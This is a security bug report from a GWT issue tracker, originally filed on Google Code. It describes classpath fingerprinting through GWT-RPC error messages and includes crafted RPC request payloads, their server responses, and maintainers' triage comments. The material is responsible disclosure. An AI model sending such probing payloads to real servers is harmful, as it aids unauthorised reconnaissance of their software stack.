Information Disclosure (Classpath Fingerprinting)

[dankurka]

Originally reported on Google Code with ID 8580

Found in GWT Release:

GWT 2.3.0

Encountered on OS / Browser:

n/a (server-side problem). Linux server.

Detailed description:

During a blackbox pentest I was able to successfully fingerprint the server classpath
(which is some kind of Information Disclosure) via error-based checks if certain classes
are available in the application's server classpath or not. This way I was able to
determine the JDBC driver loaded (and hence the database type and version used) etc.

Using this Information Disclosure about the server's classpath the attacker can fingerprint
which frameworks and libraries are used in the application (including information about
backend database drivers and alike) including their versions by checking if certain
class names (introduced in certain versions) are available or not.

The Google Security Team (which I contacted on this issue) advised me to post this
here as a public issue in the GWT bug tracker.

Shortest code snippet which demonstrates issue:

The following request (fingerprinting the existence of oracle.jdbc.OracleDriver as
an example check with "oracle.jdbc.OracleDriver" as payload):

POST /application/someapp/somepart HTTP/1.1
Host: example.com
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 1A3D772A9FBC17E884F76212EB604F54
X-GWT-Module-Base: https://example.com/application/someapp/

7|0|6|https://example.com/application/someapp/|A70812A01388A3C9292AD87689206D29|com.example.ui.web.gwt.client.ExampleService|prepareRendering|oracle.jdbc.OracleDriver/2|example.default|1|2|3|4|1|5|6|

resulted in the response:

HTTP/1.1 200 OK
Content-Disposition: attachment
Content-Length: 324
Content-Type: application/json; charset=utf-8
Content-Language: en-US

//EX[2,1,["com.google.gwt.user.client.rpc.IncompatibleRemoteServiceException/3936916533","This
application is out of date, please click the refresh button on your browser. ( Could
not locate requested method 'prepareRendering(oracle.jdbc.OracleDriver)' in interface
'com.example.ui.web.gwt.client.ExampleService' )"],0,7]

Whereas a non-existing classname results in another response (see the following request/response
for some.non.existing.ClassName as payload):

POST /application/someapp/somepart HTTP/1.1
Host: example.com
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 1A3D772A9FBC17E884F76212EB604F54
X-GWT-Module-Base: https://example.com/application/someapp/

7|0|6|https://example.com/application/someapp/|A70812A01388A3C9292AD87689206D29|com.example.ui.web.gwt.client.ExampleService|prepareRendering|some.non.existing.ClassName/2|example.default|1|2|3|4|1|5|6|

resulted in a response with the following ClassNotFoundException inside the JSON response
body:

HTTP/1.1 200 OK
Content-Disposition: attachment
Content-Length: 324
Content-Type: application/json; charset=utf-8
Content-Language: en-US

//EX[2,1,["com.google.gwt.user.client.rpc.IncompatibleRemoteServiceException/3936916533","java.lang.ClassNotFoundException:
some.non.existing.ClassName"],0,7]

Reported by mail@Christian-Schneider.net on 2014-02-16 17:37:17

[dankurka]

@Brian, @Mat you probably have an opinion right here?

Reported by dankurka@google.com on 2014-02-17 09:24:04

• Status changed: Accepted

[dankurka]

Reported by dankurka@google.com on 2014-02-17 09:25:03

• Labels added: Category-RPC

[dankurka]

We could probably fix this by checking that the class is listed in the security policy
before attempting to load it. That would still allow the attacker to deduce which classes
are in the security policy, but that doesn't seem as important since those are intentionally
client-side classes.

I'm probably not a good judge of severity; I'll defer to Matthew for that.

Reported by skybrian@google.com on 2014-02-18 04:00:27

[dankurka]

Reported by t.broyer on 2014-02-18 09:31:38

• Labels added: Security

[dankurka]

Eventually this CVE http://wicket.apache.org/2014/02/21/cve-2014-0043.html might help
to classify it: information disclosure about available classes, helpful during fingerprinting
of a target

Reported by mail@Christian-Schneider.net on 2014-02-26 00:21:57

[dankurka]

Seems like something worth trying to fix.

Reported by mdempsky@google.com on 2014-02-26 00:33:50